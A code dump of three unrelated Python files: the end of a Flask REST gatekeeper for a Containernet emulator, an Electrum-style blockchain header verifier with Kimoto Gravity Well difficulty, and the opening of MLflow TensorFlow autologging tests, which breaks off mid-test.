# return {"service_instantiations_list": [
# list(s.instances.keys()) for s in GK.services.values()]}
result = list()
for suuid, sobj in GK.services.items():
for iuuid, iobj in sobj.instances.items():
inst = dict()
inst["uuid"] = iobj.get("uuid")
inst["instance_name"] = "{}-inst.{}".format(
iobj.get("name"), iobj.get("ssiid"))
inst["status"] = "running"
inst["created_at"] = iobj.get("created_at")
result.append(inst)
return result, 200, CORS_HEADER
def delete(self):
"""
Stops a running service specified by its service and instance UUID.
"""
# try to extract the service and instance UUID from the request
json_data = request.get_json(force=True)
service_uuid_input = json_data.get("service_uuid")
instance_uuid_input = json_data.get("service_instance_uuid")
if len(GK.services) < 1:
return "No service on-boarded.", 404
# try to be fuzzy
if service_uuid_input is None:
# if we don't get a service uuid we stop all services
service_uuid_list = list(GK.services.keys())
LOG.info("No service_uuid given, stopping all.")
else:
service_uuid_list = [service_uuid_input]
# for each service
for service_uuid in service_uuid_list:
if instance_uuid_input is None:
instance_uuid_list = list(
GK.services[service_uuid].instances.keys())
else:
instance_uuid_list = [instance_uuid_input]
# for all service instances
for instance_uuid in instance_uuid_list:
if (service_uuid in GK.services and
instance_uuid in GK.services[service_uuid].instances):
# valid service and instance UUID, stop service
GK.services.get(service_uuid).stop_service(instance_uuid)
LOG.info("Service instance with uuid %r stopped." % instance_uuid)
return "Service(s) stopped.", 200
class Exit(fr.Resource):
def put(self):
"""
Stop the running Containernet instance regardless of data transmitted
"""
list(GK.dcs.values())[0].net.stop()
def generate_subnets(prefix, base, subnet_size=50, mask=24):
# Generate a list of ipaddress in subnets
r = list()
for net in range(base, base + subnet_size):
subnet = "{0}.{1}.0/{2}".format(prefix, net, mask)
try:
r.append(ipaddress.ip_network(subnet))
except ValueError:
r.append(ipaddress.ip_network(unicode(subnet)))
return r
def reset_subnets():
global ELINE_SUBNETS
global ELAN_SUBNETS
# private subnet definitions for the generated interfaces
# 30.0.xxx.0/24
ELAN_SUBNETS = generate_subnets('30.0', 0, subnet_size=50, mask=24)
# 20.0.xxx.0/24
ELINE_SUBNETS = generate_subnets('20.0', 0, subnet_size=50, mask=24)
def initialize_GK():
global GK
GK = Gatekeeper()
# create a single, global GK object
GK = None
initialize_GK()
# setup Flask
http_server = None
app = Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 512 * 1024 * 1024 # 512 MB max upload
api = fr.Api(app)
# define endpoints
api.add_resource(Packages, '/packages', '/api/v2/packages', '/api/v3/packages')
api.add_resource(Services, '/services', '/api/v2/services', '/api/v3/services')
api.add_resource(Instantiations, '/instantiations',
'/api/v2/instantiations', '/api/v2/requests', '/api/v3/requests',
'/api/v3/records/services')
api.add_resource(Exit, '/emulator/exit')
def start_rest_api(host, port, datacenters=dict()):
global http_server
GK.dcs = datacenters
GK.net = get_dc_network()
# start the Flask server (not the best performance but ok for our use case)
# app.run(host=host,
# port=port,
# debug=True,
# use_reloader=False # this is needed to run Flask in a non-main thread
# )
http_server = WSGIServer((host, port), app, log=open("/dev/null", "w"))
http_server.serve_forever()
def stop_rest_api():
if http_server:
http_server.close()
def ensure_dir(name):
if not os.path.exists(name):
os.makedirs(name)
def load_yaml(path):
with open(path, "r") as f:
try:
r = yaml.load(f)
except yaml.YAMLError as exc:
LOG.exception("YAML parse error: %r" % str(exc))
r = dict()
return r
def make_relative_path(path):
if path.startswith("file://"):
path = path.replace("file://", "", 1)
if path.startswith("/"):
path = path.replace("/", "", 1)
return path
def get_dc_network():
"""
retrieve the DCnetwork where this dummygatekeeper (GK) connects to.
Assume at least 1 datacenter is connected to this GK, and that all datacenters belong to the same DCNetwork
:return:
"""
assert (len(GK.dcs) > 0)
return list(GK.dcs.values())[0].net
def parse_interface(interface_name):
"""
convert the interface name in the nsd to the according vnf_id, vnf_interface names
:param interface_name:
:return:
"""
if ':' in interface_name:
vnf_id, vnf_interface = interface_name.split(':')
else:
vnf_id = None
vnf_interface = interface_name
return vnf_id, vnf_interface
def get_container_name(vnf_id, vdu_id, ssiid=None):
if ssiid is not None:
return "{}.{}.{}".format(vnf_id, vdu_id, ssiid)
return "{}.{}".format(vnf_id, vdu_id)
def get_triple_id(descr):
return "{}.{}.{}".format(
descr.get("vendor"), descr.get("name"), descr.get("version"))
def update_port_mapping_multi_instance(ssiid, port_bindings):
"""
Port_bindings are used to expose ports of the deployed containers.
They would collide if we deploy multiple service instances.
This function adds a offset to them which is based on the
short service instance id (SSIID).
MULTI_INSTANCE_PORT_OFFSET
"""
def _offset(p):
return p + MULTI_INSTANCE_PORT_OFFSET * ssiid
port_bindings = {k: _offset(v) for k, v in port_bindings.items()}
return port_bindings
if __name__ == '__main__':
"""
Lets allow to run the API in standalone mode.
"""
GK_STANDALONE_MODE = True
logging.getLogger("werkzeug").setLevel(logging.INFO)
start_rest_api("0.0.0.0", 8000)
|
blockchain.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@ecdsa.org
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import util
import bitcoin
from bitcoin import *
#import lyra2re_hash
#import lyra2re2_hash
import fjc_scrypt
MAX_TARGET = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
class Blockchain(util.PrintError):
'''Manages blockchain headers and their verification'''
def __init__(self, config, network):
self.config = config
self.network = network
self.checkpoint_height, self.checkpoint_hash = self.get_checkpoint()
self.check_truncate_headers()
self.set_local_height()
def height(self):
return self.local_height
def init(self):
import threading
if os.path.exists(self.path()):
self.downloading_headers = False
return
self.downloading_headers = True
t = threading.Thread(target=self.init_headers_file)
t.daemon = True
t.start()
def pass_checkpoint(self, header):
if type(header) is not dict:
return False
if header.get('block_height') != self.checkpoint_height:
return True
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00' * 32
try:
_hash = self.hash_header(header)
except:
return False
return _hash == self.checkpoint_hash
def verify_header(self, header, prev_header, bits, target):
prev_hash = self.hash_header(prev_header)
_hash = self.hash_header(header)
_powhash = self.pow_hash_header(header)
if prev_hash != header.get('prev_block_hash'):
raise BaseException("prev hash mismatch: %s vs %s" % (prev_hash, header.get('prev_block_hash')))
if not self.pass_checkpoint(header):
raise BaseException('failed checkpoint')
if self.checkpoint_height == header.get('block_height'):
self.print_error("validated checkpoint", self.checkpoint_height)
if bitcoin.TESTNET:
return
if bits != header.get('bits'):
raise BaseException("bits mismatch: %s vs %s for height %s" % (bits, header.get('bits'), header.get('block_height')))
if int('0x' + _powhash, 16) > target:
raise BaseException("insufficient proof of work: %s vs target %s" % (int('0x' + _powhash, 16), target))
def verify_chain(self, chain):
first_header = chain[0]
prev_header = self.read_header(first_header.get('block_height') - 1)
for header in chain:
height = header.get('block_height')
bits, target = self.get_target(height, chain)
self.verify_header(header, prev_header, bits, target)
prev_header = header
def verify_chunk(self, index, data):
num = len(data) / 80
prev_header = None
if index != 0:
prev_header = self.read_header(index * 2016 - 1)
headers = []
for i in range(num):
raw_header = data[i * 80:(i + 1) * 80]
header = self.deserialize_header(raw_header, index * 2016 + i)
headers.append(header)
bits, target = self.get_target(index*2016 + i, headers)
self.verify_header(header, prev_header, bits, target)
prev_header = header
def serialize_header(self, res):
s = int_to_hex(res.get('version'), 4) \
+ rev_hex(res.get('prev_block_hash')) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4)
return s
def deserialize_header(self, s, height):
hex_to_int = lambda s: int('0x' + s[::-1].encode('hex'), 16)
h = {}
h['version'] = hex_to_int(s[0:4])
h['prev_block_hash'] = hash_encode(s[4:36])
h['merkle_root'] = hash_encode(s[36:68])
h['timestamp'] = hex_to_int(s[68:72])
h['bits'] = hex_to_int(s[72:76])
h['nonce'] = hex_to_int(s[76:80])
h['block_height'] = height
return h
def hash_header(self, header):
if header is None:
return '0' * 64
return hash_encode(Hash(self.serialize_header(header).decode('hex')))
def pow_hash_header(self, header):
return rev_hex(fjc_scrypt.getPoWHash(self.serialize_header(header).decode('hex')).encode('hex'))
def path(self):
return util.get_headers_path(self.config)
def init_headers_file(self):
filename = self.path()
try:
import urllib, socket
socket.setdefaulttimeout(30)
self.print_error("downloading ", bitcoin.HEADERS_URL)
urllib.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
os.rename(filename + '.tmp', filename)
self.print_error("done.")
except Exception:
self.print_error("download failed. creating file", filename)
open(filename, 'wb+').close()
self.downloading_headers = False
self.set_local_height()
self.print_error("%d blocks" % self.local_height)
def save_chunk(self, index, chunk):
filename = self.path()
f = open(filename, 'rb+')
f.seek(index * 2016 * 80)
h = f.write(chunk)
f.close()
self.set_local_height()
def save_header(self, header):
data = self.serialize_header(header).decode('hex')
assert len(data) == 80
height = header.get('block_height')
filename = self.path()
f = open(filename, 'rb+')
f.seek(height * 80)
h = f.write(data)
f.close()
self.set_local_height()
def set_local_height(self):
self.local_height = 0
name = self.path()
if os.path.exists(name):
h = os.path.getsize(name) / 80 - 1
if self.local_height != h:
self.local_height = h
def read_header(self, block_height):
name = self.path()
if os.path.exists(name):
f = open(name, 'rb')
f.seek(block_height * 80)
h = f.read(80)
f.close()
if len(h) == 80:
h = self.deserialize_header(h, block_height)
return h
def BIP9(self, height, flag):
v = self.read_header(height)['version']
return ((v & 0xE0000000) == 0x20000000) and ((v & flag) == flag)
def segwit_support(self, N=576):
h = self.local_height
return sum([self.BIP9(h - i, 2) for i in range(N)]) * 10000 / N / 100.
def check_truncate_headers(self):
checkpoint = self.read_header(self.checkpoint_height)
if checkpoint is None:
return
if self.hash_header(checkpoint) == self.checkpoint_hash:
return
self.print_error('checkpoint mismatch:', self.hash_header(checkpoint), self.checkpoint_hash)
self.print_error('Truncating headers file at height %d' % self.checkpoint_height)
name = self.path()
f = open(name, 'rb+')
f.seek(self.checkpoint_height * 80)
f.truncate()
f.close()
def convbits(self, new_target):
c = ("%064x" % new_target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) / 2, int('0x' + c[:6], 16)
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
new_bits = bitsN << 24 | bitsBase
return new_bits
def convbignum(self, bits):
bitsN = (bits >> 24) & 0xff
if not (bitsN >= 0x03 and bitsN <= 0x1e):
raise BaseException("First part of bits should be in [0x03, 0x1e]")
bitsBase = bits & 0xffffff
if not (bitsBase >= 0x8000 and bitsBase <= 0x7fffff):
raise BaseException("Second part of bits should be in [0x8000, 0x7fffff]")
target = bitsBase << (8 * (bitsN-3))
return target
def KimotoGravityWell(self, height, chain=[], data=None):
# print_msg ("height=",height,"chain=", chain, "data=", data)
BlocksTargetSpacing = 1 * 60 # 1 minutes
TimeDaySeconds = 60 * 60 * 24
PastSecondsMin = TimeDaySeconds * 0.25
PastSecondsMax = TimeDaySeconds * 7
PastBlocksMin = PastSecondsMin / BlocksTargetSpacing
PastBlocksMax = PastSecondsMax / BlocksTargetSpacing
BlockReadingIndex = height - 1
BlockLastSolvedIndex = height - 1
TargetBlocksSpacingSeconds = BlocksTargetSpacing
PastRateAdjustmentRatio = 1.0
bnProofOfWorkLimit = 0x00000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if (BlockLastSolvedIndex <= 0 or BlockLastSolvedIndex < PastBlocksMin):
new_target = bnProofOfWorkLimit
new_bits = self.convbits(new_target)
return new_bits, new_target
last = self.read_header(BlockLastSolvedIndex)
if last == None:
for h in chain:
if h.get('block_height') == BlockLastSolvedIndex:
last = h
break
for i in xrange(1, int(PastBlocksMax) + 1):
PastBlocksMass = i
reading = self.read_header(BlockReadingIndex)
if reading == None:
for h in chain:
if h.get('block_height') == BlockReadingIndex:
# print_msg("get block from chain")
reading = h
break
if (reading == None or last == None):
raise BaseException("Could not find previous blocks when calculating difficulty reading: "
+ str(BlockReadingIndex) + ", last: " + str(BlockLastSolvedIndex) + ", height: " + str(height))
# print_msg ("last=",last)
if (i == 1):
# print_msg("reading(", BlockReadingIndex, ")=", reading)
PastDifficultyAverage = self.convbignum(reading.get('bits'))
else:
PastDifficultyAverage = float(
(self.convbignum(reading.get('bits')) - PastDifficultyAveragePrev) / float(
i)) + PastDifficultyAveragePrev
PastDifficultyAveragePrev = PastDifficultyAverage
PastRateActualSeconds = last.get('timestamp') - reading.get('timestamp')
PastRateTargetSeconds = TargetBlocksSpacingSeconds * PastBlocksMass
PastRateAdjustmentRatio = 1.0
if (PastRateActualSeconds < 0):
PastRateActualSeconds = 0.0
if (PastRateActualSeconds != 0 and PastRateTargetSeconds != 0):
PastRateAdjustmentRatio = float(PastRateTargetSeconds) / float(PastRateActualSeconds)
EventHorizonDeviation = 1 + (0.7084 * pow(float(PastBlocksMass) / float(144), -1.228))
EventHorizonDeviationFast = EventHorizonDeviation
EventHorizonDeviationSlow = float(1) / float(EventHorizonDeviation)
# print_msg ("EventHorizonDeviation=",EventHorizonDeviation,"EventHorizonDeviationFast=",EventHorizonDeviationFast,"EventHorizonDeviationSlow=",EventHorizonDeviationSlow )
if (PastBlocksMass >= PastBlocksMin):
if ((PastRateAdjustmentRatio <= EventHorizonDeviationSlow) or (
PastRateAdjustmentRatio >= EventHorizonDeviationFast)):
break
if (BlockReadingIndex < 1):
break
BlockReadingIndex = BlockReadingIndex - 1
# print_msg ("BlockReadingIndex=",BlockReadingIndex )
# print_msg ("for end: PastBlocksMass=",PastBlocksMass )
bnNew = PastDifficultyAverage
if (PastRateActualSeconds != 0 and PastRateTargetSeconds != 0):
bnNew *= float(PastRateActualSeconds)
bnNew /= float(PastRateTargetSeconds)
if (bnNew > bnProofOfWorkLimit):
bnNew = bnProofOfWorkLimit
# new target
new_target = bnNew
new_bits = self.convbits(new_target)
# print_msg("bits", new_bits , "(", hex(new_bits),")")
# print_msg ("PastRateAdjustmentRatio=",PastRateAdjustmentRatio,"EventHorizonDeviationSlow",EventHorizonDeviationSlow,"PastSecondsMin=",PastSecondsMin,"PastSecondsMax=",PastSecondsMax,"PastBlocksMin=",PastBlocksMin,"PastBlocksMax=",PastBlocksMax)
return new_bits, new_target
def get_target(self, height, chain=None):
if bitcoin.TESTNET:
return 0, 0
if height == 0:
return 0x1e0ffff0, 0x00000FFFF0000000000000000000000000000000000000000000000000000000
return self.KimotoGravityWell(height, chain)
def connect_header(self, chain, header):
'''Builds a header chain until it connects. Returns True if it has
successfully connected, False if verification failed, otherwise the
height of the next header needed.'''
chain.append(header) # Ordered by decreasing height
previous_height = header['block_height'] - 1
previous_header = self.read_header(previous_height)
# Missing header, request it
if not previous_header:
return previous_height
# Does it connect to my chain?
prev_hash = self.hash_header(previous_header)
if prev_hash != header.get('prev_block_hash'):
self.print_error("reorg")
return previous_height
# The chain is complete. Reverse to order by increasing height
chain.reverse()
try:
self.verify_chain(chain)
self.print_error("new height:", previous_height + len(chain))
for header in chain:
self.save_header(header)
return True
except BaseException as e:
self.print_error(str(e))
return False
def connect_chunk(self, idx, hexdata):
try:
data = hexdata.decode('hex')
self.verify_chunk(idx, data)
self.print_error("validated chunk %d" % idx)
self.save_chunk(idx, data)
return idx + 1
except BaseException as e:
self.print_error('verify_chunk failed', str(e))
return idx - 1
def get_checkpoint(self):
height = self.config.get('checkpoint_height', 0)
value = self.config.get('checkpoint_value', bitcoin.GENESIS)
return (height, value)
def set_checkpoint(self, height, value):
self.checkpoint_height = height
self.checkpoint_hash = value
self.config.set_key('checkpoint_height', height)
self.config.set_key('checkpoint_value', value)
self.check_truncate_headers()
|
test_tensorflow2_autolog.py
|
# pep8: disable=E501
import collections
import pytest
from distutils.version import LooseVersion
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import layers
import mlflow
import mlflow.tensorflow
import mlflow.keras
from mlflow.utils.autologging_utils import BatchMetricsLogger
from unittest.mock import patch
import os
np.random.seed(1337)
SavedModelInfo = collections.namedtuple(
"SavedModelInfo",
["path", "meta_graph_tags", "signature_def_key", "inference_df", "expected_results_df"],
)
@pytest.fixture(autouse=True)
def clear_session():
yield
tf.keras.backend.clear_session()
@pytest.fixture
def random_train_data():
return np.random.random((150, 4))
@pytest.fixture
def random_one_hot_labels():
n, n_class = (150, 3)
classes = np.random.randint(0, n_class, n)
labels = np.zeros((n, n_class))
labels[np.arange(n), classes] = 1
return labels
@pytest.fixture(params=[True, False])
def manual_run(request):
if request.param:
mlflow.start_run()
yield
mlflow.end_run()
def create_tf_keras_model():
model = tf.keras.Sequential()
model.add(layers.Dense(16, activation="relu", input_shape=(4,)))
model.add(layers.Dense(3, activation="softmax"))
model.compile(
optimizer=tf.keras.optimizers.Adam(), loss="categorical_crossentropy", metrics=["accuracy"]
)
return model
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
def test_tf_keras_autolog_ends_auto_created_run(
random_train_data, random_one_hot_labels, fit_variant
):
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
else:
model.fit(data, labels, epochs=10)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("log_models", [True, False])
def test_tf_keras_autolog_log_models_configuration(
random_train_data, random_one_hot_labels, log_models
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(log_models=log_models)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_id = client.list_run_infos(experiment_id="0")[0].run_id
artifacts = client.list_artifacts(run_id)
artifacts = map(lambda x: x.path, artifacts)
assert ("model" in artifacts) == log_models
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
def test_tf_keras_autolog_persists_manually_created_run(
random_train_data, random_one_hot_labels, fit_variant
):
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
else:
model.fit(data, labels, epochs=10)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_keras_random_data_run(
random_train_data, random_one_hot_labels, manual_run, fit_variant, initial_epoch
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if fit_variant == "fit_generator":
def generator():
while True:
yield data, labels
history = model.fit_generator(
generator(), epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
else:
history = model.fit(
data, labels, epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_logs_expected_data(tf_keras_random_data_run):
run, history = tf_keras_random_data_run
data = run.data
assert "accuracy" in data.metrics
assert "loss" in data.metrics
# Testing explicitly passed parameters are logged correctly
assert "epochs" in data.params
assert data.params["epochs"] == str(history.epoch[-1] + 1)
assert "steps_per_epoch" in data.params
assert data.params["steps_per_epoch"] == "1"
# Testing default parameters are logged correctly
assert "initial_epoch" in data.params
assert data.params["initial_epoch"] == str(history.epoch[0])
# Testing unwanted parameters are not logged
assert "callbacks" not in data.params
assert "validation_data" not in data.params
# Testing optimizer parameters are logged
assert "opt_name" in data.params
assert data.params["opt_name"] == "Adam"
assert "opt_learning_rate" in data.params
assert "opt_decay" in data.params
assert "opt_beta_1" in data.params
assert "opt_beta_2" in data.params
assert "opt_epsilon" in data.params
assert "opt_amsgrad" in data.params
assert data.params["opt_amsgrad"] == "False"
client = mlflow.tracking.MlflowClient()
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
num_of_epochs = len(history.history["loss"])
assert len(all_epoch_acc) == num_of_epochs == 10
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model_summary.txt" in artifacts
@pytest.mark.large
def test_tf_keras_autolog_records_metrics_for_last_epoch(random_train_data, random_one_hot_labels):
every_n_iter = 5
num_training_epochs = 17
mlflow.tensorflow.autolog(every_n_iter=every_n_iter)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data, random_one_hot_labels, epochs=num_training_epochs, initial_epoch=0,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
assert set([metric.step for metric in all_epoch_acc]) == set([0, 5, 10, 15])
@pytest.mark.large
def test_tf_keras_autolog_logs_metrics_for_single_epoch_training(
random_train_data, random_one_hot_labels
):
"""
tf.Keras exhibits inconsistent epoch indexing behavior in comparison with other
TF2 APIs (e.g., tf.Estimator). tf.Keras uses zero-indexing for epochs,
while other APIs use one-indexing. Accordingly, this test verifies that metrics are
produced in the boundary case where a model is trained for a single epoch, ensuring
that we don't miss the zero index in the tf.Keras case.
"""
mlflow.tensorflow.autolog(every_n_iter=5)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data, random_one_hot_labels, epochs=1,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
assert "loss" in run_metrics
@pytest.mark.large
def test_tf_keras_autolog_names_positional_parameters_correctly(
random_train_data, random_one_hot_labels
):
mlflow.tensorflow.autolog(every_n_iter=5)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
with mlflow.start_run():
# Pass `batch_size` as a positional argument for testing purposes
model.fit(data, labels, 8, epochs=10, steps_per_epoch=1)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run_info = client.get_run(run_id)
assert run_info.data.params.get("batch_size") == "8"
@pytest.mark.large
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_model_can_load_from_artifact(tf_keras_random_data_run, random_train_data):
run, _ = tf_keras_random_data_run
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
assert "tensorboard_logs" in artifacts
model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
model.predict(random_train_data)
@pytest.fixture
def tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
manual_run,
callback,
restore_weights,
patience,
initial_epoch,
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(every_n_iter=1)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if callback == "early":
# min_delta is set as such to guarantee early stopping
callback = tf.keras.callbacks.EarlyStopping(
monitor="loss",
patience=patience,
min_delta=99999999,
restore_best_weights=restore_weights,
verbose=1,
)
else:
class CustomCallback(tf.keras.callbacks.Callback):
def on_train_end(self, logs=None):
print("Training completed")
callback = CustomCallback()
history = model.fit(
data, labels, epochs=initial_epoch + 10, callbacks=[callback], initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history, callback
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_logs(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" in metrics
restored_epoch = int(metrics["restored_epoch"])
assert int(metrics["stopped_epoch"]) - max(1, callback.patience) == restored_epoch
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == max(1, callback.patience) + 1
# Check that MLflow has logged the metrics of the "best" model
assert len(metric_history) == num_of_epochs + 1
# Check that MLflow has logged the correct data
assert history.history["loss"][history.epoch.index(restored_epoch)] == metric_history[-1].value
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_batch_metrics_logger_logs_expected_metrics(
callback, restore_weights, patience, initial_epoch
):
patched_metrics_data = []
# Mock patching BatchMetricsLogger.record_metrics()
# to ensure that expected metrics are being logged.
original = BatchMetricsLogger.record_metrics
with patch(
"mlflow.utils.autologging_utils.BatchMetricsLogger.record_metrics", autospec=True
) as record_metrics_mock:
def record_metrics_side_effect(self, metrics, step=None):
patched_metrics_data.extend(metrics.items())
original(self, metrics, step)
record_metrics_mock.side_effect = record_metrics_side_effect
run, _, callback = tf_keras_random_data_run_with_callback(
random_train_data(),
random_one_hot_labels(),
manual_run,
callback,
restore_weights,
patience,
initial_epoch,
)
patched_metrics_data = dict(patched_metrics_data)
original_metrics = run.data.metrics
for metric_name in original_metrics:
assert metric_name in patched_metrics_data
restored_epoch = int(patched_metrics_data["restored_epoch"])
assert int(patched_metrics_data["stopped_epoch"]) - max(1, callback.patience) == restored_epoch
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [11])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_stop_does_not_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert metrics["stopped_epoch"] == 0
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_restore_doesnt_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == callback.patience + 1
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["not-early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_non_early_stop_callback_no_log(tf_keras_random_data_run_with_callback):
run, history = tf_keras_random_data_run_with_callback[:-1]
metrics = run.data.metrics
params = run.data.params
assert "patience" not in params
assert "monitor" not in params
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.parametrize("fit_variant", ["fit", "fit_generator"])
@pytest.mark.parametrize("positional", [True, False])
def test_tf_keras_autolog_does_not_mutate_original_callbacks_list(
tmpdir, random_train_data, random_one_hot_labels, fit_variant, positional
):
"""
TensorFlow autologging passes new callbacks to the `fit()` / `fit_generator()` function. If
preexisting user-defined callbacks already exist, these new callbacks are added to the
user-specified ones. This test verifies that the new callbacks are added to the without
permanently mutating the original list of callbacks.
"""
mlflow.tensorflow.autolog()
